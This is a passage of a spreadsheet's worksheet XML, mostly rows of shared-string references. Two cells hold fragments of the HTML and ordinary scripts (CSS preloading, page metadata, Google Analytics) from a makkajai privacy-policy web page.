      </c>
    </row>
    <row r="6616" spans="1:2">
      <c r="A6616" t="s">
        <v>159</v>
      </c>
      <c r="B6616" t="s">
        <v>3956</v>
      </c>
    </row>
    <row r="6617" spans="1:2">
      <c r="A6617" t="s">
        <v>159</v>
      </c>
      <c r="B6617" t="s">
        <v>3957</v>
      </c>
    </row>
    <row r="6618" spans="1:2">
      <c r="A6618" t="s">
        <v>159</v>
      </c>
      <c r="B6618" t="s">
        <v>3958</v>
      </c>
    </row>
    <row r="6619" spans="1:2">
      <c r="A6619" t="s">
        <v>159</v>
      </c>
      <c r="B6619" t="s">
        <v>3959</v>
      </c>
    </row>
    <row r="6620" spans="1:2">
      <c r="A6620" t="s">
        <v>159</v>
      </c>
      <c r="B6620" t="s">
        <v>3960</v>
      </c>
    </row>
    <row r="6621" spans="1:2">
      <c r="A6621" t="s">
        <v>159</v>
      </c>
      <c r="B6621" t="s">
        <v>3961</v>
      </c>
    </row>
    <row r="6622" spans="1:2">
      <c r="A6622" t="s">
        <v>159</v>
      </c>
      <c r="B6622" t="s">
        <v>3962</v>
      </c>
    </row>
    <row r="6623" spans="1:2">
      <c r="A6623" t="s">
        <v>159</v>
      </c>
      <c r="B6623" t="s">
        <v>3963</v>
      </c>
    </row>
    <row r="6624" spans="1:2">
      <c r="A6624" t="s">
        <v>159</v>
      </c>
      <c r="B6624" t="s">
        <v>1950</v>
      </c>
    </row>
    <row r="6625" spans="1:2">
      <c r="A6625" t="s">
        <v>159</v>
      </c>
      <c r="B6625" t="s">
        <v>1951</v>
      </c>
    </row>
    <row r="6626" spans="1:2">
      <c r="A6626" t="s">
        <v>159</v>
      </c>
      <c r="B6626" t="s">
        <v>1952</v>
      </c>
    </row>
    <row r="6627" spans="1:2">
      <c r="A6627" t="s">
        <v>159</v>
      </c>
      <c r="B6627" t="s">
        <v>1953</v>
      </c>
    </row>
    <row r="6628" spans="1:2">
      <c r="A6628" t="s">
        <v>159</v>
      </c>
      <c r="B6628" t="s">
        <v>1954</v>
      </c>
    </row>
    <row r="6629" spans="1:2">
      <c r="A6629" t="s">
        <v>159</v>
      </c>
      <c r="B6629" t="s">
        <v>1955</v>
      </c>
    </row>
    <row r="6630" spans="1:2">
      <c r="A6630" t="s">
        <v>159</v>
      </c>
      <c r="B6630" t="s">
        <v>1956</v>
      </c>
    </row>
    <row r="6631" spans="1:2">
      <c r="A6631" t="s">
        <v>159</v>
      </c>
      <c r="B6631" t="s">
        <v>1957</v>
      </c>
    </row>
    <row r="6632" spans="1:2">
      <c r="A6632" t="s">
        <v>159</v>
      </c>
      <c r="B6632" t="s">
        <v>1958</v>
      </c>
    </row>
    <row r="6633" spans="1:2">
      <c r="A6633" t="s">
        <v>159</v>
      </c>
      <c r="B6633" t="s">
        <v>663</v>
      </c>
    </row>
    <row r="6634" spans="1:2">
      <c r="A6634" t="s">
        <v>159</v>
      </c>
      <c r="B6634" t="s">
        <v>664</v>
      </c>
    </row>
    <row r="6635" spans="1:2">
      <c r="A6635" t="s">
        <v>159</v>
      </c>
      <c r="B6635" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="6636" spans="1:2">
      <c r="A6636" t="s">
        <v>159</v>
      </c>
      <c r="B6636" t="s">
        <v>666</v>
      </c>
    </row>
    <row r="6637" spans="1:2">
      <c r="A6637" t="s">
        <v>159</v>
      </c>
      <c r="B6637" t="s">
        <v>1959</v>
      </c>
    </row>
    <row r="6638" spans="1:2">
      <c r="A6638" t="s">
        <v>159</v>
      </c>
      <c r="B6638" t="s">
        <v>1960</v>
      </c>
    </row>
    <row r="6639" spans="1:2">
      <c r="A6639" t="s">
        <v>159</v>
      </c>
      <c r="B6639" t="s">
        <v>1961</v>
      </c>
    </row>
    <row r="6640" spans="1:2">
      <c r="A6640" t="s">
        <v>159</v>
      </c>
      <c r="B6640" t="s">
        <v>1962</v>
      </c>
    </row>
    <row r="6641" spans="1:2">
      <c r="A6641" t="s">
        <v>159</v>
      </c>
      <c r="B6641" t="s">
        <v>1963</v>
      </c>
    </row>
    <row r="6642" spans="1:2">
      <c r="A6642" t="s">
        <v>159</v>
      </c>
      <c r="B6642" t="s">
        <v>3964</v>
      </c>
    </row>
    <row r="6643" spans="1:2">
      <c r="A6643" t="s">
        <v>159</v>
      </c>
      <c r="B6643" t="s">
        <v>3965</v>
      </c>
    </row>
    <row r="6644" spans="1:2">
      <c r="A6644" t="s">
        <v>159</v>
      </c>
      <c r="B6644" t="s">
        <v>3966</v>
      </c>
    </row>
    <row r="6645" spans="1:2">
      <c r="A6645" t="s">
        <v>35</v>
      </c>
      <c r="B6645" t="s">
        <v>1182</v>
      </c>
    </row>
    <row r="6646" spans="1:2">
      <c r="A6646" t="s">
        <v>35</v>
      </c>
      <c r="B6646" t="s">
        <v>1183</v>
      </c>
    </row>
    <row r="6647" spans="1:2">
      <c r="A6647" t="s">
        <v>35</v>
      </c>
      <c r="B6647" t="s">
        <v>1184</v>
      </c>
    </row>
    <row r="6648" spans="1:2">
      <c r="A6648" t="s">
        <v>35</v>
      </c>
      <c r="B6648" t="s">
        <v>1185</v>
      </c>
    </row>
    <row r="6649" spans="1:2">
      <c r="A6649" t="s">
        <v>35</v>
      </c>
      <c r="B6649" t="s">
        <v>1186</v>
      </c>
    </row>
    <row r="6650" spans="1:2">
      <c r="A6650" t="s">
        <v>35</v>
      </c>
      <c r="B6650" t="s">
        <v>1187</v>
      </c>
    </row>
    <row r="6651" spans="1:2">
      <c r="A6651" t="s">
        <v>35</v>
      </c>
      <c r="B6651" t="s">
        <v>1188</v>
      </c>
    </row>
    <row r="6652" spans="1:2">
      <c r="A6652" t="s">
        <v>35</v>
      </c>
      <c r="B6652" t="s">
        <v>1189</v>
      </c>
    </row>
    <row r="6653" spans="1:2">
      <c r="A6653" t="s">
        <v>35</v>
      </c>
      <c r="B6653" t="s">
        <v>1190</v>
      </c>
    </row>
    <row r="6654" spans="1:2">
      <c r="A6654" t="s">
        <v>160</v>
      </c>
      <c r="B6654" t="s">
        <v>3967</v>
      </c>
    </row>
    <row r="6655" spans="1:2">
      <c r="A6655" t="s">
        <v>160</v>
      </c>
      <c r="B6655" t="s">
        <v>3961</v>
      </c>
    </row>
    <row r="6656" spans="1:2">
      <c r="A6656" t="s">
        <v>160</v>
      </c>
      <c r="B6656" t="s">
        <v>3968</v>
      </c>
    </row>
    <row r="6657" spans="1:2">
      <c r="A6657" t="s">
        <v>160</v>
      </c>
      <c r="B6657" t="s">
        <v>3969</v>
      </c>
    </row>
    <row r="6658" spans="1:2">
      <c r="A6658" t="s">
        <v>160</v>
      </c>
      <c r="B6658" t="s">
        <v>3970</v>
      </c>
    </row>
    <row r="6659" spans="1:2">
      <c r="A6659" t="s">
        <v>160</v>
      </c>
      <c r="B6659" t="s">
        <v>2950</v>
      </c>
    </row>
    <row r="6660" spans="1:2">
      <c r="A6660" t="s">
        <v>160</v>
      </c>
      <c r="B6660" t="s">
        <v>3971</v>
      </c>
    </row>
    <row r="6661" spans="1:2">
      <c r="A6661" t="s">
        <v>160</v>
      </c>
      <c r="B6661" t="s">
        <v>3972</v>
      </c>
    </row>
    <row r="6662" spans="1:2">
      <c r="A6662" t="s">
        <v>160</v>
      </c>
      <c r="B6662" t="s">
        <v>3973</v>
      </c>
    </row>
    <row r="6663" spans="1:2">
      <c r="A6663" t="s">
        <v>160</v>
      </c>
      <c r="B6663" t="s">
        <v>3974</v>
      </c>
    </row>
    <row r="6664" spans="1:2">
      <c r="A6664" t="s">
        <v>160</v>
      </c>
      <c r="B6664" t="s">
        <v>3975</v>
      </c>
    </row>
    <row r="6665" spans="1:2">
      <c r="A6665" t="s">
        <v>160</v>
      </c>
      <c r="B6665" t="s">
        <v>3976</v>
      </c>
    </row>
    <row r="6666" spans="1:2">
      <c r="A6666" t="s">
        <v>160</v>
      </c>
      <c r="B6666" t="s">
        <v>3977</v>
      </c>
    </row>
    <row r="6667" spans="1:2">
      <c r="A6667" t="s">
        <v>160</v>
      </c>
      <c r="B6667" t="s">
        <v>3978</v>
      </c>
    </row>
    <row r="6668" spans="1:2">
      <c r="A6668" t="s">
        <v>160</v>
      </c>
      <c r="B6668" t="s">
        <v>3979</v>
      </c>
    </row>
    <row r="6669" spans="1:2">
      <c r="A6669" t="s">
        <v>160</v>
      </c>
      <c r="B6669" t="s">
        <v>3980</v>
      </c>
    </row>
    <row r="6670" spans="1:2">
      <c r="A6670" t="s">
        <v>160</v>
      </c>
      <c r="B6670" t="s">
        <v>3981</v>
      </c>
    </row>
    <row r="6671" spans="1:2">
      <c r="A6671" t="s">
        <v>160</v>
      </c>
      <c r="B6671" t="s">
        <v>3982</v>
      </c>
    </row>
    <row r="6672" spans="1:2">
      <c r="A6672" t="s">
        <v>160</v>
      </c>
      <c r="B6672" t="s">
        <v>3983</v>
      </c>
    </row>
    <row r="6673" spans="1:2">
      <c r="A6673" t="s">
        <v>160</v>
      </c>
      <c r="B6673" t="s">
        <v>3984</v>
      </c>
    </row>
    <row r="6674" spans="1:2">
      <c r="A6674" t="s">
        <v>160</v>
      </c>
      <c r="B6674" t="s">
        <v>3985</v>
      </c>
    </row>
    <row r="6675" spans="1:2">
      <c r="A6675" t="s">
        <v>160</v>
      </c>
      <c r="B6675" t="s">
        <v>3986</v>
      </c>
    </row>
    <row r="6676" spans="1:2">
      <c r="A6676" t="s">
        <v>160</v>
      </c>
      <c r="B6676" t="s">
        <v>3987</v>
      </c>
    </row>
    <row r="6677" spans="1:2">
      <c r="A6677" t="s">
        <v>160</v>
      </c>
      <c r="B6677" t="s">
        <v>3988</v>
      </c>
    </row>
    <row r="6678" spans="1:2">
      <c r="A6678" t="s">
        <v>160</v>
      </c>
      <c r="B6678" t="s">
        <v>3989</v>
      </c>
    </row>
    <row r="6679" spans="1:2">
      <c r="A6679" t="s">
        <v>161</v>
      </c>
      <c r="B6679" t="s">
        <v>3990</v>
      </c>
    </row>
    <row r="6680" spans="1:2">
      <c r="A6680" t="s">
        <v>161</v>
      </c>
      <c r="B6680" t="s">
        <v>3991</v>
      </c>
    </row>
    <row r="6681" spans="1:2">
      <c r="A6681" t="s">
        <v>161</v>
      </c>
      <c r="B6681" t="s">
        <v>3992</v>
      </c>
    </row>
    <row r="6682" spans="1:2">
      <c r="A6682" t="s">
        <v>161</v>
      </c>
      <c r="B6682" t="s">
        <v>3993</v>
      </c>
    </row>
    <row r="6683" spans="1:2">
      <c r="A6683" t="s">
        <v>161</v>
      </c>
      <c r="B6683" t="s">
        <v>3994</v>
      </c>
    </row>
    <row r="6684" spans="1:2">
      <c r="A6684" t="s">
        <v>161</v>
      </c>
      <c r="B6684" t="s">
        <v>3995</v>
      </c>
    </row>
    <row r="6685" spans="1:2">
      <c r="A6685" t="s">
        <v>161</v>
      </c>
      <c r="B6685" t="s">
        <v>3996</v>
      </c>
    </row>
    <row r="6686" spans="1:2">
      <c r="A6686" t="s">
        <v>161</v>
      </c>
      <c r="B6686" t="s">
        <v>3997</v>
      </c>
    </row>
    <row r="6687" spans="1:2">
      <c r="A6687" t="s">
        <v>161</v>
      </c>
      <c r="B6687" t="s">
        <v>3998</v>
      </c>
    </row>
    <row r="6688" spans="1:2">
      <c r="A6688" t="s">
        <v>161</v>
      </c>
      <c r="B6688" t="s">
        <v>3999</v>
      </c>
    </row>
    <row r="6689" spans="1:2">
      <c r="A6689" t="s">
        <v>161</v>
      </c>
      <c r="B6689" t="s">
        <v>4000</v>
      </c>
    </row>
    <row r="6690" spans="1:2">
      <c r="A6690" t="s">
        <v>161</v>
      </c>
      <c r="B6690" t="s">
        <v>4001</v>
      </c>
    </row>
    <row r="6691" spans="1:2">
      <c r="A6691" t="s">
        <v>161</v>
      </c>
      <c r="B6691" t="s">
        <v>4002</v>
      </c>
    </row>
    <row r="6692" spans="1:2">
      <c r="A6692" t="s">
        <v>162</v>
      </c>
      <c r="B6692" t="s">
        <v>4003</v>
      </c>
    </row>
    <row r="6693" spans="1:2">
      <c r="A6693" t="s">
        <v>162</v>
      </c>
      <c r="B6693">
        <f>n||"all"}return a.addEventListener&amp;&amp;a.addEventListener("load",s),(a.onloadcssdefined=d)(s),a}"undefined"!=typeof exports?exports.loadCSS=e:u.loadCSS=e}("undefined"!=typeof global?global:this),function(r){if(r.loadCSS){var e=loadCSS.relpreload={};if(e.support=function(){try{return r.document.createElement("link").relList.supports("preload")}catch(e){return!1}},e.poly=function(){for(var e=r.document.getElementsByTagName("link"),t=0;t&lt;e.length;t++){var n=e[t];"preload"===n.rel&amp;&amp;"style"===n.getAttribute("as")&amp;&amp;(r.loadCSS(n.href,n,n.getAttribute("media")),n.rel=null)}},!e.support()){e.poly();var t=r.setInterval(e.poly,300);r.addEventListener&amp;&amp;r.addEventListener("load",function(){e.poly(),r.clearInterval(t)}),r.attachEvent&amp;&amp;r.attachEvent("onload",function(){r.clearInterval(t)})}}}(this);&lt;/script&gt;
&lt;link rel="preload stylesheet" media="screen" href="https://static-assets.strikinglycdn.com/themes/app/main_v4.7b11f39f81afb620b5a7.bundle.css" as="style" type="text/css" onload="if(media!==&amp;#39;screen&amp;#39;)media=&amp;#39;screen&amp;#39;"&gt;
&lt;link defer="true" href="https://user-images.strikinglycdn.com/res/hrscywv4p/image/upload/c_limit,h_64,w_64/191653/angry_maxx_hpb9ff.png" rel="shortcut icon" type="image/x-icon"&gt;
&lt;meta content="Privacy Policy - makkajai | Fun Learning" property="og:title"&gt;
&lt;meta content="https://www.makkajai.com/privacy-policy" property="og:url"&gt;
&lt;meta content="//user-images.strikinglycdn.com/res/hrscywv4p/image/upload/c_limit,h_630,w_1200,f_auto,q_90/191653/angry_maxx_ueciui.png" property="og:image"&gt;
&lt;meta content="makkajai | Fun Learning" property="og:site_name"&gt;
&lt;meta content="" property="og:description"&gt;
&lt;meta content="makkajai | Fun Learning" itemprop="name"&gt;
&lt;meta content="" itemprop="description"&gt;
&lt;meta content="//user-images.strikinglycdn.com/res/hrscywv4p/image/upload/c_limit,h_630,w_1200,f_auto,q_90/191653/angry_maxx_ueciui.png" itemprop="image"&gt;
&lt;meta content="summary_large_image" name="twitter:card"&gt;
&lt;meta content="Privacy Policy - makkajai | Fun Learning" name="twitter:title"&gt;
&lt;meta content="" name="twitter:description"&gt;
&lt;meta content="//user-images.strikinglycdn.com/res/hrscywv4p/image/upload/c_limit,h_630,w_1200,f_auto,q_90/191653/angry_maxx_ueciui.png" name="twitter:image"&gt;
&lt;meta content="" name="description"&gt;
&lt;meta name="support-helper" content="{&amp;quot;permalink&amp;quot;:&amp;quot;makkajai&amp;quot;,&amp;quot;id&amp;quot;:17049177}"&gt;
&lt;link rel="canonical" href="https://www.makkajai.com/privacy-policy"&gt;
&lt;script&gt;
var _strk = _strk || []
_strk.push = function(arg1, arg2){
  var _arrayPush = Array.prototype.push.bind(this)
  if (typeof arg1 === 'string' &amp;&amp; typeof arg2 === 'function') {
    // Support _strk.push(event, fn) for better UX
    _arrayPush([arg1, arg2])
  } else {
    _arrayPush.apply(this, arguments)
  }
}
window.runAfterDomBinding = {
  add: function(name, fn) {
    _strk.push(['Page.didMount', fn])
  }
}
&lt;/script&gt;
&lt;meta name="google-site-verification" content=""&gt;
&lt;!--</f>
        <v>0</v>
      </c>
    </row>
    <row r="6694" spans="1:2">
      <c r="A6694" t="s">
        <v>162</v>
      </c>
      <c r="B6694" t="s">
        <v>4004</v>
      </c>
    </row>
    <row r="6695" spans="1:2">
      <c r="A6695" t="s">
        <v>162</v>
      </c>
      <c r="B6695" t="s">
        <v>4005</v>
      </c>
    </row>
    <row r="6696" spans="1:2">
      <c r="A6696" t="s">
        <v>162</v>
      </c>
      <c r="B6696" t="s">
        <v>4006</v>
      </c>
    </row>
    <row r="6697" spans="1:2">
      <c r="A6697" t="s">
        <v>162</v>
      </c>
      <c r="B6697" t="s">
        <v>4007</v>
      </c>
    </row>
    <row r="6698" spans="1:2">
      <c r="A6698" t="s">
        <v>162</v>
      </c>
      <c r="B6698" t="s">
        <v>4008</v>
      </c>
    </row>
    <row r="6699" spans="1:2">
      <c r="A6699" t="s">
        <v>162</v>
      </c>
      <c r="B6699" t="s">
        <v>4009</v>
      </c>
    </row>
    <row r="6700" spans="1:2">
      <c r="A6700" t="s">
        <v>162</v>
      </c>
      <c r="B6700" t="s">
        <v>4010</v>
      </c>
    </row>
    <row r="6701" spans="1:2">
      <c r="A6701" t="s">
        <v>162</v>
      </c>
      <c r="B6701" t="s">
        <v>4011</v>
      </c>
    </row>
    <row r="6702" spans="1:2">
      <c r="A6702" t="s">
        <v>162</v>
      </c>
      <c r="B6702" t="s">
        <v>4012</v>
      </c>
    </row>
    <row r="6703" spans="1:2">
      <c r="A6703" t="s">
        <v>162</v>
      </c>
      <c r="B6703" t="s">
        <v>4013</v>
      </c>
    </row>
    <row r="6704" spans="1:2">
      <c r="A6704" t="s">
        <v>162</v>
      </c>
      <c r="B6704" t="s">
        <v>4014</v>
      </c>
    </row>
    <row r="6705" spans="1:2">
      <c r="A6705" t="s">
        <v>162</v>
      </c>
      <c r="B6705" t="s">
        <v>4015</v>
      </c>
    </row>
    <row r="6706" spans="1:2">
      <c r="A6706" t="s">
        <v>162</v>
      </c>
      <c r="B6706" t="s">
        <v>4016</v>
      </c>
    </row>
    <row r="6707" spans="1:2">
      <c r="A6707" t="s">
        <v>162</v>
      </c>
      <c r="B6707" t="s">
        <v>4017</v>
      </c>
    </row>
    <row r="6708" spans="1:2">
      <c r="A6708" t="s">
        <v>162</v>
      </c>
      <c r="B6708" t="s">
        <v>4018</v>
      </c>
    </row>
    <row r="6709" spans="1:2">
      <c r="A6709" t="s">
        <v>162</v>
      </c>
      <c r="B6709" t="s">
        <v>4019</v>
      </c>
    </row>
    <row r="6710" spans="1:2">
      <c r="A6710" t="s">
        <v>162</v>
      </c>
      <c r="B6710" t="s">
        <v>4020</v>
      </c>
    </row>
    <row r="6711" spans="1:2">
      <c r="A6711" t="s">
        <v>162</v>
      </c>
      <c r="B6711" t="s">
        <v>4021</v>
      </c>
    </row>
    <row r="6712" spans="1:2">
      <c r="A6712" t="s">
        <v>162</v>
      </c>
      <c r="B6712" t="s">
        <v>4022</v>
      </c>
    </row>
    <row r="6713" spans="1:2">
      <c r="A6713" t="s">
        <v>162</v>
      </c>
      <c r="B6713" t="s">
        <v>4023</v>
      </c>
    </row>
    <row r="6714" spans="1:2">
      <c r="A6714" t="s">
        <v>162</v>
      </c>
      <c r="B6714" t="s">
        <v>4024</v>
      </c>
    </row>
    <row r="6715" spans="1:2">
      <c r="A6715" t="s">
        <v>162</v>
      </c>
      <c r="B6715" t="s">
        <v>4025</v>
      </c>
    </row>
    <row r="6716" spans="1:2">
      <c r="A6716" t="s">
        <v>162</v>
      </c>
      <c r="B6716" t="s">
        <v>4026</v>
      </c>
    </row>
    <row r="6717" spans="1:2">
      <c r="A6717" t="s">
        <v>162</v>
      </c>
      <c r="B6717" t="s">
        <v>4027</v>
      </c>
    </row>
    <row r="6718" spans="1:2">
      <c r="A6718" t="s">
        <v>162</v>
      </c>
      <c r="B6718" t="s">
        <v>4028</v>
      </c>
    </row>
    <row r="6719" spans="1:2">
      <c r="A6719" t="s">
        <v>162</v>
      </c>
      <c r="B6719" t="s">
        <v>4029</v>
      </c>
    </row>
    <row r="6720" spans="1:2">
      <c r="A6720" t="s">
        <v>162</v>
      </c>
      <c r="B6720" t="s">
        <v>4030</v>
      </c>
    </row>
    <row r="6721" spans="1:2">
      <c r="A6721" t="s">
        <v>162</v>
      </c>
      <c r="B6721" t="s">
        <v>4031</v>
      </c>
    </row>
    <row r="6722" spans="1:2">
      <c r="A6722" t="s">
        <v>163</v>
      </c>
      <c r="B6722" t="s">
        <v>4032</v>
      </c>
    </row>
    <row r="6723" spans="1:2">
      <c r="A6723" t="s">
        <v>163</v>
      </c>
      <c r="B6723" t="s">
        <v>4033</v>
      </c>
    </row>
    <row r="6724" spans="1:2">
      <c r="A6724" t="s">
        <v>163</v>
      </c>
      <c r="B6724" t="s">
        <v>4034</v>
      </c>
    </row>
    <row r="6725" spans="1:2">
      <c r="A6725" t="s">
        <v>163</v>
      </c>
      <c r="B6725" t="s">
        <v>4035</v>
      </c>
    </row>
    <row r="6726" spans="1:2">
      <c r="A6726" t="s">
        <v>163</v>
      </c>
      <c r="B6726" t="s">
        <v>4036</v>
      </c>
    </row>
    <row r="6727" spans="1:2">
      <c r="A6727" t="s">
        <v>163</v>
      </c>
      <c r="B6727" t="s">
        <v>4037</v>
      </c>
    </row>
    <row r="6728" spans="1:2">
      <c r="A6728" t="s">
        <v>163</v>
      </c>
      <c r="B6728" t="s">
        <v>4038</v>
      </c>
    </row>
    <row r="6729" spans="1:2">
      <c r="A6729" t="s">
        <v>163</v>
      </c>
      <c r="B6729" t="s">
        <v>4039</v>
      </c>
    </row>
    <row r="6730" spans="1:2">
      <c r="A6730" t="s">
        <v>163</v>
      </c>
      <c r="B6730" t="s">
        <v>4040</v>
      </c>
    </row>
    <row r="6731" spans="1:2">
      <c r="A6731" t="s">
        <v>163</v>
      </c>
      <c r="B6731" t="s">
        <v>4041</v>
      </c>
    </row>
    <row r="6732" spans="1:2">
      <c r="A6732" t="s">
        <v>163</v>
      </c>
      <c r="B6732" t="s">
        <v>4042</v>
      </c>
    </row>
    <row r="6733" spans="1:2">
      <c r="A6733" t="s">
        <v>163</v>
      </c>
      <c r="B6733" t="s">
        <v>4043</v>
      </c>
    </row>
    <row r="6734" spans="1:2">
      <c r="A6734" t="s">
        <v>163</v>
      </c>
      <c r="B6734" t="s">
        <v>4044</v>
      </c>
    </row>
    <row r="6735" spans="1:2">
      <c r="A6735" t="s">
        <v>163</v>
      </c>
      <c r="B6735" t="s">
        <v>4045</v>
      </c>
    </row>
    <row r="6736" spans="1:2">
      <c r="A6736" t="s">
        <v>163</v>
      </c>
      <c r="B6736" t="s">
        <v>4046</v>
      </c>
    </row>
    <row r="6737" spans="1:2">
      <c r="A6737" t="s">
        <v>163</v>
      </c>
      <c r="B6737" t="s">
        <v>4047</v>
      </c>
    </row>
    <row r="6738" spans="1:2">
      <c r="A6738" t="s">
        <v>163</v>
      </c>
      <c r="B6738" t="s">
        <v>4048</v>
      </c>
    </row>
    <row r="6739" spans="1:2">
      <c r="A6739" t="s">
        <v>163</v>
      </c>
      <c r="B6739" t="s">
        <v>4049</v>
      </c>
    </row>
    <row r="6740" spans="1:2">
      <c r="A6740" t="s">
        <v>163</v>
      </c>
      <c r="B6740" t="s">
        <v>4050</v>
      </c>
    </row>
    <row r="6741" spans="1:2">
      <c r="A6741" t="s">
        <v>163</v>
      </c>
      <c r="B6741" t="s">
        <v>4051</v>
      </c>
    </row>
    <row r="6742" spans="1:2">
      <c r="A6742" t="s">
        <v>163</v>
      </c>
      <c r="B6742" t="s">
        <v>4052</v>
      </c>
    </row>
    <row r="6743" spans="1:2">
      <c r="A6743" t="s">
        <v>163</v>
      </c>
      <c r="B6743" t="s">
        <v>4053</v>
      </c>
    </row>
    <row r="6744" spans="1:2">
      <c r="A6744" t="s">
        <v>163</v>
      </c>
      <c r="B6744" t="s">
        <v>4054</v>
      </c>
    </row>
    <row r="6745" spans="1:2">
      <c r="A6745" t="s">
        <v>163</v>
      </c>
      <c r="B6745" t="s">
        <v>4055</v>
      </c>
    </row>
    <row r="6746" spans="1:2">
      <c r="A6746" t="s">
        <v>163</v>
      </c>
      <c r="B6746" t="s">
        <v>4056</v>
      </c>
    </row>
    <row r="6747" spans="1:2">
      <c r="A6747" t="s">
        <v>163</v>
      </c>
      <c r="B6747" t="s">
        <v>4057</v>
      </c>
    </row>
    <row r="6748" spans="1:2">
      <c r="A6748" t="s">
        <v>163</v>
      </c>
      <c r="B6748" t="s">
        <v>4058</v>
      </c>
    </row>
    <row r="6749" spans="1:2">
      <c r="A6749" t="s">
        <v>163</v>
      </c>
      <c r="B6749" t="s">
        <v>4059</v>
      </c>
    </row>
    <row r="6750" spans="1:2">
      <c r="A6750" t="s">
        <v>163</v>
      </c>
      <c r="B6750" t="s">
        <v>4060</v>
      </c>
    </row>
    <row r="6751" spans="1:2">
      <c r="A6751" t="s">
        <v>163</v>
      </c>
      <c r="B6751" t="s">
        <v>4061</v>
      </c>
    </row>
    <row r="6752" spans="1:2">
      <c r="A6752" t="s">
        <v>163</v>
      </c>
      <c r="B6752" t="s">
        <v>4062</v>
      </c>
    </row>
    <row r="6753" spans="1:2">
      <c r="A6753" t="s">
        <v>164</v>
      </c>
      <c r="B6753" t="s">
        <v>4063</v>
      </c>
    </row>
    <row r="6754" spans="1:2">
      <c r="A6754" t="s">
        <v>164</v>
      </c>
      <c r="B6754" t="s">
        <v>4064</v>
      </c>
    </row>
    <row r="6755" spans="1:2">
      <c r="A6755" t="s">
        <v>164</v>
      </c>
      <c r="B6755" t="s">
        <v>4065</v>
      </c>
    </row>
    <row r="6756" spans="1:2">
      <c r="A6756" t="s">
        <v>164</v>
      </c>
      <c r="B6756" t="s">
        <v>4066</v>
      </c>
    </row>
    <row r="6757" spans="1:2">
      <c r="A6757" t="s">
        <v>164</v>
      </c>
      <c r="B6757" t="s">
        <v>4067</v>
      </c>
    </row>
    <row r="6758" spans="1:2">
      <c r="A6758" t="s">
        <v>164</v>
      </c>
      <c r="B6758" t="s">
        <v>4068</v>
      </c>
    </row>
    <row r="6759" spans="1:2">
      <c r="A6759" t="s">
        <v>164</v>
      </c>
      <c r="B6759" t="s">
        <v>4069</v>
      </c>
    </row>
    <row r="6760" spans="1:2">
      <c r="A6760" t="s">
        <v>164</v>
      </c>
      <c r="B6760" t="s">
        <v>4070</v>
      </c>
    </row>
    <row r="6761" spans="1:2">
      <c r="A6761" t="s">
        <v>164</v>
      </c>
      <c r="B6761" t="s">
        <v>4071</v>
      </c>
    </row>
    <row r="6762" spans="1:2">
      <c r="A6762" t="s">
        <v>164</v>
      </c>
      <c r="B6762" t="s">
        <v>4072</v>
      </c>
    </row>
    <row r="6763" spans="1:2">
      <c r="A6763" t="s">
        <v>164</v>
      </c>
      <c r="B6763" t="s">
        <v>4073</v>
      </c>
    </row>
    <row r="6764" spans="1:2">
      <c r="A6764" t="s">
        <v>164</v>
      </c>
      <c r="B6764" t="s">
        <v>4074</v>
      </c>
    </row>
    <row r="6765" spans="1:2">
      <c r="A6765" t="s">
        <v>164</v>
      </c>
      <c r="B6765" t="s">
        <v>4075</v>
      </c>
    </row>
    <row r="6766" spans="1:2">
      <c r="A6766" t="s">
        <v>164</v>
      </c>
      <c r="B6766" t="s">
        <v>4076</v>
      </c>
    </row>
    <row r="6767" spans="1:2">
      <c r="A6767" t="s">
        <v>164</v>
      </c>
      <c r="B6767" t="s">
        <v>4077</v>
      </c>
    </row>
    <row r="6768" spans="1:2">
      <c r="A6768" t="s">
        <v>164</v>
      </c>
      <c r="B6768" t="s">
        <v>4078</v>
      </c>
    </row>
    <row r="6769" spans="1:2">
      <c r="A6769" t="s">
        <v>164</v>
      </c>
      <c r="B6769" t="s">
        <v>4079</v>
      </c>
    </row>
    <row r="6770" spans="1:2">
      <c r="A6770" t="s">
        <v>164</v>
      </c>
      <c r="B6770" t="s">
        <v>4080</v>
      </c>
    </row>
    <row r="6771" spans="1:2">
      <c r="A6771" t="s">
        <v>164</v>
      </c>
      <c r="B6771" t="s">
        <v>4081</v>
      </c>
    </row>
    <row r="6772" spans="1:2">
      <c r="A6772" t="s">
        <v>164</v>
      </c>
      <c r="B6772">
        <f> window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());
    gtag('config', 'UA-84588334-7');
&lt;/script&gt;
    &lt;/body&gt;
&lt;/html&gt;</f>
        <v>0</v>
      </c>
    </row>
    <row r="6773" spans="1:2">
      <c r="A6773" t="s">
        <v>165</v>
      </c>
      <c r="B6773" t="s">
        <v>4082</v>
      </c>
    </row>
    <row r="6774" spans="1:2">
      <c r="A6774" t="s">
        <v>165</v>
      </c>
      <c r="B6774" t="s">
        <v>4083</v>
      </c>
    </row>
    <row r="6775" spans="1:2">
      <c r="A6775" t="s">
        <v>165</v>
      </c>
      <c r="B6775" t="s">
        <v>4084</v>
      </c>
    </row>
    <row r="6776" spans="1:2">
      <c r="A6776" t="s">
        <v>165</v>
      </c>
      <c r="B6776" t="s">
        <v>4085</v>
      </c>
    </row>
    <row r="6777" spans="1:2">
      <c r="A6777" t="s">
        <v>165</v>
      </c>
      <c r="B6777" t="s">
        <v>4086</v>
      </c>
    </row>
    <row r="6778" spans="1:2">
      <c r="A6778" t="s">
        <v>165</v>
      </c>
      <c r="B6778" t="s">
        <v>4087</v>
      </c>
    </row>
    <row r="6779" spans="1:2">
      <c r="A6779" t="s">
        <v>165</v>
      </c>
      <c r="B6779" t="s">
        <v>4088</v>
      </c>
    </row>
    <row r="6780" spans="1:2">
      <c r="A6780" t="s">
        <v>165</v>
      </c>
      <c r="B6780" t="s">
        <v>1950</v>
      </c>
    </row>
    <row r="6781" spans="1:2">
      <c r="A6781" t="s">
        <v>165</v>
      </c>
      <c r="B6781" t="s">
        <v>1951</v>
      </c>
    </row>
    <row r="6782" spans="1:2">
      <c r="A6782" t="s">
        <v>165</v>
      </c>
      <c r="B6782" t="s">
        <v>1952</v>
      </c>
    </row>
    <row r="6783" spans="1:2">
      <c r="A6783" t="s">
        <v>165</v>
      </c>
      <c r="B6783" t="s">
        <v>1953</v>
      </c>
    </row>
    <row r="6784" spans="1:2">
      <c r="A6784" t="s">
        <v>165</v>
      </c>
      <c r="B6784" t="s">
        <v>1954</v>
      </c>
    </row>
    <row r="6785" spans="1:2">
      <c r="A6785" t="s">
        <v>165</v>
      </c>
      <c r="B6785" t="s">
        <v>1955</v>
      </c>
    </row>
    <row r="6786" spans="1:2">
      <c r="A6786" t="s">
        <v>165</v>
